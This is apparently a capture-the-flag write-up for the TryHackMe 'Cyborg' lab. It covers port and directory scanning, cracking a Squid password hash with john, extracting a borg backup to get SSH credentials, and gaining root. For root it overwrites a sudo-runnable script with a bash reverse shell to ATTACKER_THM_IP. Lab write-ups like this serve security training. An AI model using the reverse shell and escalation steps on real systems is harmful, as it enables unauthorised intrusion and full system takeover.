Room Details

TryHackMe Cyborg room contains:

  • Service Discovery
  • Web Content Discovery
  • Hash Cracking
  • Data Decompression
  • Privilege Escalation


  • IP:

Service Discovery

  • Scan for open ports with nmap
$ nmap -sC -sV -A -sS -Pn -oN nmap.txt
Nmap scan report for
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
1   279.37 ms
2   ... 3
4   514.99 ms

OS and Service detection performed. Please report any incorrect results at .
  • Services Discovered

    Service Port Version
    HTTP 80 Apache 2.4.18
    SSH 22 OpenSSH 7.2p2
  • OS: Ubuntu from service description

  • Answer Task 2 first three questions

Web Content Discovery

  • Scan for directories using gobuster

    gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
  • Directories Discovered

Dirs Description Files Found
/admin homepage from archive dropdown found archive.tar file
/etc squid proxy squid password and configuration files

Analyzing Directories

  • From /etc found /etc/squid/passwd which contains password hash and squid config file /etc/squid/squid.conf

    # reading files
    # /etc/squid/passwd
    # /etc/squid/squid.conf
    auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
    auth_param basic children 5
    auth_param basic realm Squid Basic Authentication
    auth_param basic credentialsttl 2 hours
    acl auth_users proxy_auth REQUIRED
    http_access allow auth_users

Cracking Password Hash

  • Store hash into a file passwd_hash.txt

  • Crack the hash using hashcat

    john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

    squidward (music_archive)

  • We’ve successfully found the password from the hash

Analyzing Tar file

  • extract tar file

    tar -xvf archive.tar
  • Found readme file which leads us to the borg documentation page

  • We need to install borg to extract the files from the compressed format

  • Install borg

    sudo apt install borgbackup -y

    For debian based
    For other distribution refer borg installation documentation

  • decompress extracted files from archive.tar using borg

    borg extract ./home/field/dev/final_archive::music_archive
  • After files are decompressed successfully, it data turns out to the home directory backup for alex’s account

  • Found Password from /home/alex/Documents/note.txt

    Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

Login with ssh

  • Login using alex’s

    ssh [email protected]
    [email protected] password: # enter password from note.txt
    Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
    * Documentation:
    * Management:
    * Support:
    27 packages can be updated.
    0 updates are security updates.
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    [email protected]:~$
  • We got access to Alex Account

Get User Flag

[email protected]:~$ cat user.txt

Privilege Escalation

  • Check for sudo exectuables

    [email protected]:~$ sudo -l
    Matching Defaults entries for alex on ubuntu:
        env_reset, mail_badpass,
    User alex may run the following commands on ubuntu:
        (ALL : ALL) NOPASSWD: /etc/mp3backups/

    We can run file /etc/mp3backups/ as with root privileges

  • Check whether file is writable

    [email protected]:~$ ls -la /etc/mp3backups/
    -r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/

    We cannot write file, but user is alex, so we can change file permissions using chmod

  • Allow all permissions to the files

    [email protected]:~$ chmod 777 /etc/mp3backups/

    Note: Allowing all users rwx permissions isn’t a good practice, but for ease, I’ve provided them rights

  • Overwrite file with Bash Reverse Shell on alex’s machine

    [email protected]:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/

    Reverse shell will connect to attacker’s machine on port 4444

  • Start netcat on attacker’s machine

    nc -nlvp 4444
  • Execute bash script from target machine

    [email protected]:~$ sudo /etc/mp3backups/
  • Now, we’ve successfully rooted the machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [] 36492
    [email protected]:~#

Get Root Flag

[email protected]:~# cat root.txt